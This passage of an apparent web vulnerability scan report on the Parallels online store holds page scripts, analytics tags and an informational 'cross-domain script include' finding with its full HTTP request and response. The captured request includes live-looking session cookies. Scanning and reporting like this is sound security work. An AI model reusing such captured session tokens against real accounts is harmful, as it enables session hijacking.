$('#dr_optInEmail div.dr_formLine').replaceWith('<div class="dr_formLine"><label for="optIn" class="dr_label">We would like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" value="on" name="ORIG_VALUE_optIn"/><input type="checkbox" checked="checked" value="on" name="optIn"/></div>');

// Continue Button on Billing Page
$('input#checkoutButton').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','88px').css('height','23px');

// Top Submit Button on Verify Order Page
$('input#submitTop').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Bottom Submit Button on Verify Order Page
$('input#submitBottom').css('background-color','#ffffff').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/checkoutButton.jpg)').css('background-repeat','no-repeat').css('width','115px').css('height','23px');

// Change Delivery Method to Delivery
$('table#dr_confirmTbl th.dr_deliveryMethod').html('Delivery');

// Remove border from dr_Content Table on Verify Order Page
$('table.dr_confirmTable').css('border','0px');

// Adding border to the Table
$('#dr_cartTbl > tbody > tr > td:first-child').css('background-image','url(/DRHM/Storefront/Site/para/cm/images/lightGreyPixel.gif)').css('background-repeat','repeat-y');
$('#dr_cartTbl > tbody > tr > td:last-child').css('border-right','1px solid #e5e5e5');
// $('#dr_cartTbl > tbody > tr:last-child > td').css('border-bottom','1px solid #e5e5e5');
$('<tr><td colspan="5" style="padding:0; margin:0"><table width="100%" border="0" class="bottomCurveTable"><tr><td class="leftRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/leftRoundBottom_v2.gif);background-repeat:no-repeat;background-position:0 0;height:9px;width:12px"></td><td class="middleLineBottom" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/middleLineBottom.gif);background-repeat:repeat-x"></td><td class="rightRoundBottom" width="12" style="background-image:url(/DRHM/Storefront/Site/para/cm/images/rightRoundBottom_v2.gif);background-repeat:no-repeat;background-position:top right;height:9px;width:12px"></td></tr></table></td></tr>').appendTo('table#dr_cartTbl');

// Reposition the "Order Number" field on the Invoice page
$('<br /><br />').insertBefore('#dr_Invoice span#dr_orderNumber'); // drop below the order date
$('<br />').insertBefore('#dr_Invoice div#dr_billingAddress');// add space between Ord num and bill addr

// Remove the parallels.com cs email link and form
$("#dr_TechnicalAssistance p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_DownloadInformation p:contains('parallels.us.cs@digitalriver.com')").remove();
$("#dr_technicalSupportSection p:contains('OR')").remove();
$("#dr_contactFormSection").remove();

// Replace Payment Method dd on Order Info page
$('#dr_OrderInformation dl div.dr_q2 dd').replaceWith('<dd>We accept Visa&#174;, MasterCard&#174;, EuroCard, Discover&#174;, American Express&#174;, and Diner\'s Club&#174;, as well as PayPal, check cards and ATM cards if they are issued by one of these major credit card companies. We also accept checks, money orders, and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order.<p>Our servers encrypt all information submitted to them, so you can be confident that your credit card information will be kept safe and secure.</p></dd>');
// Remove "How do I start a new order?" from "Need Help?" page
$('#dr_Help #dr_helpColumnLeft #dr_orderInformationFAQ ul li.dr_q12').remove();
// Remove "How do I start a new order?" from Order Info page
$('#dr_OrderInformation dl div.dr_q12').remove();
// Replace "Can I order without a credit card?" dd on Order Info page
$('#dr_OrderInformation dl div.dr_q7 dd').replaceWith('<dd>Yes. In addition to credit cards we accept checks, PayPal, money orders and wire transfers. If you choose to pay by check, money order, or wire transfer, you will receive instructions on how to send your payment once you submit your order. </dd>');

// Change Refund Request URL on "Returns and Cancellations" page
$('#dr_ReturnAndCancellations dl div.dr_q3 dd').replaceWith('<dd>To request a refund, go to <a href="http://www.parallels.com/support" target="_blank">www.parallels.com/support</a>.</dd>');

//Updated Backup CD addon button on shopping cart page

$("#dr_ThreePgCheckoutShoppingCart div.addonDetailsButton a img, div.dr_candyRackChildProduct img.dr_buttonCandyRack").attr("src", "/DRHM/Storefront/Site/para/cm/images/Add_4.gif");

$('#dr_ProductDetails #dr_socialNetworkLinks').hide();

$('div.dr_candyRackChildProduct').insertAfter('h2.hdr-alpha');

</script>

<!--!/esi:include -->











<span class="opDefault" id="opmodule_para_bodyBottom"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyBottom');
</script>









<script type="text/javascript">
var s_account = 'swsdev';
var omnChannel,omnProp2,omnProp4,omnEvents,omnProducts,omnState,omnZip,omnPurchaseID;
var omnPageName='ThreePgCheckoutShoppingCartPage';

</script>



<script type="text/javascript">
function omnitureProducts(prodString) { // convert FC string to Omniture string
rExp = /,/g;
rExp2 = /\?/g;
prodStringDelimiter = prodString.replace(rExp, ',;');
prodStringSeparator = prodStringDelimiter.replace(rExp2, ';');
s_products = ';'+prodStringSeparator;
return s_products;
}
omnPageName='Checkout: Shopping Cart';
omnChannel='Checkout';
omnProp2='Checkout: Shopping Cart';
omnProp4='Checkout';
omnEvents='scView';
if (typeof fc_prod_remove != 'undefined'){
omnProducts=omnitureProducts(fc_prod_remove);
omnEvents='scRemove';
}
if (typeof fc_prod_add != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scAdd';
}
if (typeof fc_prod_open != 'undefined'){
omnProducts=omnitureProducts(fc_prod_add);
omnEvents='scOpen,scAdd';
}
if (typeof fc_prod_view != 'undefined'){
omnEvents='scView';
}
</script>











   







<script type="text/javascript">

















































</script>
















   
   



   


       <script type="text/javascript">(function(){var cfsTrack = function(){setTimeout(function(){var img = new Image(1,1);img.src = '//7154199726---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif';}, 100);};if (window.attachEvent) {window.attachEvent('onload', cfsTrack);} else {window.addEventListener('load', cfsTrack, false);}})();</script><noscript><img src="//7154199726---0---globalCommerce---0---173-193-214-243.cfspx.digitalriver.com/images/cleardot.gif" height=1 width=1 alt="" border="0" /></noscript>








<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/s_code_20102010.js"></script>
<script type="text/javascript">









</script>
<script type="text/javascript">
       s.pageName=omnPageName
       if (omnChannel) s.channel= omnChannel
       s.currencyCode='USD'
       s.charSet='UTF-8'
       if (omnProp4) s.pageType= omnProp4 // Page Type
       /* Traffice Variables */
       if (omnProp2) s.prop2= omnProp2 //Category
       if (omnProp4) s.prop4= omnProp4 // Page Type
       /* Conversion Variables */
       if (omnState) s.state= omnState
       if (omnZip) s.zip= omnZip
       if (omnEvents) s.events = omnEvents
       if (omnProducts) s.products= omnProducts
       if (omnPurchaseID) s.purchaseID = omnPurchaseID
       /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
       var s_code=s.t();if(s_code)document.write(s_code)
</script>













<!-- ################################ -->
<!-- ### BEGIN Google Custom, TOP ### -->
<script type="text/javascript">
   var _gaq = _gaq || [];

   _gaq.push(['_setAccount', 'UA-363966-1']);
   _gaq.push(['_setDomainName', '.parallels.com']);
   _gaq.push(['_setAllowHash', false]);
   _gaq.push(['_trackPageview']);

   (function() {
       var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
       ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

       var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
   })();
</script>
<!-- ### END Google Custom, TOP ### -->
<!-- ################################ -->



<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 1067174464;
var google_conversion_language = "en_US";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "g5WWCMyrvQEQwJTv_AM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1067174464/?label=g5WWCMyrvQEQwJTv_AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>




   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->



<script src="http://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>


<!-- end retargeting pixel -->













</body>
</html>
4. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

4.1. http://store.parallels.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.parallels.com
Path:   /store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage HTTP/1.1
Host: store.parallels.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/small-business-panel/windows/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aspcms_sid=ed047e3c47a758dd56638158d4729675; __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.1.10.1299874733; s_cc=true; s_gpv_page=ParallelsSmallBusinessPanelforWindowsEN; s_vnum=1331410733871%26vn%3D1; s_invisit=true; s_nr=1299874733877-New; s_sq=%5B%5BB%5D%5D; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=68351301417,0)
Date: Fri, 11 Mar 2011 20:18:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 42028




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=d445603d&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutShoppingCartPage"-->






<!-- REQUEST ID: TIME=1299866217516:NODE=c1a6104:THREAD=37; ESI Fragment - CREATED: Fri Mar 11 11:56:57 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Shopping Cart</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutShoppingCartPage_contentBody -->
<script>
optrial.pageName = 'ThreePgCheckoutShoppingCartPage';

// Portfolio: GC-para
// Subject: ThreePgCheckoutShoppingCartPage
(function(){var _o=ptomodule;_o.U="https://ssl.pto.digitalriver.com/by/trial/612/p/threepgcheckoutshoppingcartpage./15/content.js";
_o.ST="script";_o.SA={"type":"text/javascript"};_o.B();_o.R(1000,null,null,null);})();
</script>
<!-- End of OT_ThreePgCheckoutShoppingCartPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874692219:NODE=c1a6104:THREAD=71 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutShoppingCartPage_contentBody">























<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutShoppingCartPage, Generated: Tue Mar 08 16:04:09 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" class="dr_Content" id="dr_ThreePgCheckoutShoppingCart">
<h1>Shopping Cart</h1>
<div id="dr_currencySelector">
<form method="get" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<p>
<strong>Select Currency:</strong>
<select name="currency" onChange="q=false;this.form.submit();">
<option selected="selected">USD</option>
<option>AED</option>
<option>ARS</option>
<option>AUD</option>
<option>BGN</option>
<option>BRL</option>
<option>CAD</option>
<option>CHF</option>
<option>CLP</option>
<option>CNY</option>
<option>CZK</option>
<option>DKK</option>
<option>EEK</option>
<option>EGP</option>
<option>EUR</option>
<option>GBP</option>
<option>HKD</option>
<option>HRK</option>
<option>IDR</option>
<option>ILS</option>
<option>INR</option>
<option>ISK</option>
<option>JPY</option>
<option>KRW</option>
<option>LTL</option>
<option>LVL</option>
<option>MXN</option>
<option>MYR</option>
<option>NOK</option>
<option>NZD</option>
<option>PLN</option>
<option>RUB</option>
<option>SAR</option>
<option>SEK</option>
<option>SGD</option>
<option>THB</option>
<option>TRY</option>
<option>TWD</option>
<option>UAH</option>
<option>ZAR</option>
</select>
<noscript>
<input type="submit" class="dr_button" value="update"/>
</noscript>
</p>
</form>
</div>
<form method="post" action="/store/">
<input name="Action" type="hidden" value="DisplayThreePgCheckoutShoppingCartPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.ShoppingCartForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutShoppingCartPage"/>
<div id="dr_orderNumber">
<p>
<strong>Reference Number:</strong>..7154199726</p>
</div>
<div id="dr_shoppingCartTable">
<table id="dr_cartTbl" summary="This table contains your Shopping Cart information">
<thead>
<tr>
<th scope="col" class="dr_productName">Product Name</th>
<th class="dr_qty" scope="col">Qty</th>
<th class="dr_deliveryMethod" scope="col">Delivery</th>
<th class="dr_price">Price</th>
<th class="dr_remove" scope="col">remove</th>
</tr>
</thead>
<tbody>
<tr class="dr_oddRow">
<td scope="row" class="dr_productName">
<a target="_blank" href="/store/para/en_US/DisplayPage/id.ProductInterstitialDetailsPage/productID.222100500" onclick="popUp(this.href,'productDetail',450,400);return false;" lineItemID="5217904426">Parallels Small Business Panel for Windows - 1 User</a>
</td>
<td class="dr_qty">
<input type="hidden" name="ORIG_VALUE_lineItemID$$1001" value="5217904426"/>
<input name="lineItemID$$1001" value="5217904426" type="hidden"/>
<span class="dr_error">
<!--..-->
</span>
<input type="hidden" name="ORIG_VALUE_quantity$$1001" value="2"/>
<input name="quantity$$1001" value="2" size="2" class="dr_qtyInput" type="text"/>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
</td>
<td class="dr_deliveryMethod" scope="row"/>
<td scope="row" class="dr_price">$80.00</td>
<td class="dr_remove" scope="row">
<a class="dr_deleteItemLink" href="/store/para/en_US/RemoveItemFromRequisition/lineItemID.5217904426/nextAction.DisplayThreePgCheckoutShoppingCartPage" title="remove" rel="nofollow">
<img class="dr_deleteItemImage" border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/removex2new.gif" alt="remove"/>
</a>
</td>
</tr>
<tr>
<td colspan="5" class="dr_backUpCD">
<div class="bucket-noheader-container">
<div class="bucket-top">
<span/>
</div>
<div class="bucket-borders">
<div class="bucket-noheader-content">
<div class="candy">
<h2 class="hdr-alpha">
<span id="dr_candyRackHeader" class="dr_subHeader">
<em>
                                                           We also recommend:
                                                       </em>
</span>
</h2>
</div>
</div>
</div>
<div class="bucket-btm">
<span>..</span>
</div>
</div>
</td>
</tr>
<tr>
<td colspan="3" class="dr_couponCode">
<label for="promoCode">Promo Code:</label>
<input type="hidden" name="ORIG_VALUE_popName" value="PointOfSale_CouponEntryField"/>
<input name="popName" value="PointOfSale_CouponEntryField" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_couponCode" value=""/>
<input name="couponCode" value="" type="text" size="10" id="promoCode"/>
<input type="image" class="dr_button" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_apply.gif"/>
</td>
<td colspan="2" class="dr_updateBtn"/>
</tr>
<tr id="dr_cartTotals">
<td colspan="3"/>
<td id="dr_totals" colspan="2">
<table width="100%" cellpadding="0" cellspacing="0" border="0">
<tr id="dr_priceTotal">
<td class="dr_price dr_totals">Total: $80.00</td>
</tr>
</table>
</td>
</tr>
</tbody>
</table>
</div>
<input type="image" class="dr_refreshQtyImage" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_update.gif" alt="update" title="update"/>
<div id="dr_siteButtons">
<div id="dr_continueShoppingButton">
<a class="dr_button" href="/store/para/en_US/ContinueShopping">
<img border="0" alt="continue shopping" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_continueShopping.gif"/>
</a>
</div>
<div id="dr_checkoutButton">
<a class="dr_button" href="https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage">
<img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/para/cm/buttons/button_checkout.gif" alt="checkout"/>
</a>
</div>
</div>
<div id="creditCardLogos">
<img alt="Accept Credit Cards" src="/DRHM/Storefront/Site/para/cm/images/payment-methods2.gif"/>
</div>
<p id="dr_cartPricingDisclaimer" class="dr_clearBoth">Prices and offers in the cart are subject to change until the order is submitted.</p>
<div id="dr_TCFooter"><div id="dr_overlay_wrapper" style="position:absolute;width:687px;height:383px;display:none;"><table border="0" cellspacing="0" cellpadding="0" id="dr_overlay_table"><tr><td class="dr_overlay_table_top_left">&nbsp;</td><td class="dr_overlay_table_top_middle">&nbsp;</td><td class="dr_overlay_table_top_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_left">&nbsp;</td><td class="dr_overlay_table_middle"><div id="dr_overlay_header"><div id="dr_overlay_close_window"><a href="#" title="Close Window"><img src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" align="right" alt="Close Window" border="0"/></a></div><div id="dr_overlay_logo"><a href="/store/defaults/en_US&id=DRAboutDigitalRiverPage" target="DrOverlayIframe"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/images/dr_logo_0209.gif" width="115" height="27" alt="Digital River" border="0"></a></div><div class="dr_overlay_clearit"><!-- --></div><div id="dr_overlay_nav"><ul id="dr_overlay_tabs"><li class="dr_overlay_about_digital_river"><a id="ContactInformationLink" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage" target="DrOverlayIframe">About Digital River, Inc.</a></li><li class="dr_overlay_privacy_policy"><a id="PrivacyPolicyLink" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage" target="DrOverlayIframe">Privacy Policy</a></li><li class="dr_overlay_terms_and_conditions"><a id="TermsAndConditionsLink" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage" target="DrOverlayIframe">Terms of Sale</a></li><li class="dr_overlay_print"><a href="#"><img border="0" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/icon_printer.gif" alt="Print"/></a></li></ul><!-- /#dr_overlay_tabs --></div><div class="dr_overlay_clearit"><!-- --></div></div><!-- /#dr_overlay_header --><iframe name="DrOverlayIframe" src="javascript:false" width="665" height="300" scrolling="auto" frameborder="0" marginheight="0" marginwidth="0"></iframe></td><td class="dr_overlay_table_right">&nbsp;</td></tr><tr><td class="dr_overlay_table_bottom_left">&nbsp;</td><td class="dr_overlay_table_bottom_middle">&nbsp;</td><td class="dr_overlay_table_bottom_right">&nbsp;</td></tr></table></div><!-- /#dr_overlay_wrapper --><script type="text/javascript">if (!window.jQuery) {document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');}</script><script type="text/javascript">(function($){$(window).load(function(){if ($.boxModel || ($.support && $.support.boxModel)) {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.base.css" type="text/css"/>');var msie = navigator.userAgent.match(/MSIE (\d+)/);var ie6 = false;var dataOK = true;if (msie) {var ver = parseInt(msie[1]);if (ver < 8) {dataOK = false;if (ver < 7) {ie6 = true;$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE6.css" type="text/css"/>');}else {$('head').append('<link rel="stylesheet" href="//drh2.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.IE7.css" type="text/css"/>');}}}else if (/Firefox\/3\.5/.test(navigator.userAgent)) {dataOK = false;}if (dataOK) {$('head').append('<link rel="stylesheet" href="//drh1.img.digitalriver.com/DRHM/Storefront/Library/content/css/drtc_overlay.data.css" type="text/css"/>');}var overlaySetup = function(){var footerLinkSelector = 'a.dr_aboutDigitalRiver,a.dr_privacyPolicy,a.dr_termsAndConditions';$(footerLinkSelector).removeAttr('onclick');$('#dr_overlay_wrapper').overlay({fixed: !ie6,modal: {css: {backgroundColor: '#FFF'}},showSelector: footerLinkSelector,hideSelector: '#dr_overlay_close_window > a[href="#"]',onShow: function(bgOverlay, footerLink){var iframeOverlay = this;$(bgOverlay).fadeIn('normal', function(){if (ie6) {self.scrollTo(0, 0);}$(iframeOverlay).slideDown('slow');});$('iframe', this).one('load', function(){$(this).css('visibility', 'visible');});parent.frames[footerLink.target].location.replace(footerLink.href);return false;},onHide: function(bgOverlay){$(this).hide();$(bgOverlay).fadeOut('normal');return false;}}).find('li.dr_overlay_print > a[href="#"]').click(function(){if (window['DrOverlayIframe']) {window['DrOverlayIframe'].focus();window['DrOverlayIframe'].print();}}).end().find('#dr_overlay_logo > a,li.dr_overlay_about_digital_river > a,li.dr_overlay_privacy_policy > a,li.dr_overlay_terms_and_conditions > a').click(function(){parent.frames[this.target].location.replace(this.href);return false;});};if ($.fn.overlay) {overlaySetup();}else {$.ajax({url: '//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/plugins/jquery.overlay-1.1.min.js',dataType: 'script',cache: true,global: false,success: overlaySetup});}}});})(jQuery);</script><p><a class="dr_aboutDigitalRiver" href="/store/defaults/en_US/DisplayDRAboutDigitalRiverPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'aboutDigitalRiver',400,400);return false;" target="DrOverlayIframe">Digital River Inc.</a> is the authorized reseller and merchant of the products and services offered within this store.</p><p><a class="dr_privacyPolicy" href="/store/defaults/en_US/DisplayDRPrivacyPolicyPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'privacyPolicy',660,400);return false;" target="DrOverlayIframe">Privacy Policy</a>&nbsp;&nbsp;&nbsp;<a class="dr_termsAndConditions" href="/store/defaults/en_US/DisplayDRTermsAndConditionsPage/eCommerceProvider.Digital+River+Inc." onclick="popUp(this.href,'termsAndConditions',630,400);return false;" target="DrOverlayIframe">Terms of Sale</a>&nbsp;&nbsp;&nbsp;</p></div>
</form>
</div>
</div>




<script type="text/javascript">
// Called via onchange from shipping dropdown
function changeEstimatedShipping(zoneList, optionList, shippingForm) {
if (zoneList.selectedIndex !== 0) {
shippingForm.shippingOptionID.value = optionList.options[optionList.selectedIndex].value;
shippingForm.country.value = zoneList.options[zoneList.selectedIndex].value;
q = false;
shippingForm.submit();
}
}
// fireclick
var fc_track = "shopping_cart";









/* Add */
var fc_prod_add = "[1]SP-SMBPanel Parallels Small Business Panel for Windows - 1 User?222100500?1?40.00";







</script>


</span><!-- /.opDefaultContent -->
<script type="text/javascript">
ptomodule.displayModule('para_ThreePgCheckoutShoppingCartPage_contentBody');
</script>
















<!-- popUp overlay tags -->
<div class="popup_window_wrapper" style="display:none;position:absolute;">
<div class="popup_window_title_bar_wrapper">
<div class="popup_shadow9"></div>
<div class="popup_title_bar">
<h1 class="popup_title_header"></h1>
<div class="popup_close_button_wrapper">
<div class="popup_button_cover"><a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/close_en_US.gif" alt="Close Window" border="0"/></a></div>
<div class="popup_title_fade"></div><div class="popup_clear_it"><!-- --></div>
</div><!-- /.popup_close_button_wrapper -->
</div><!-- /.popup_title_bar -->
<div class="popup_shadow1"></div>
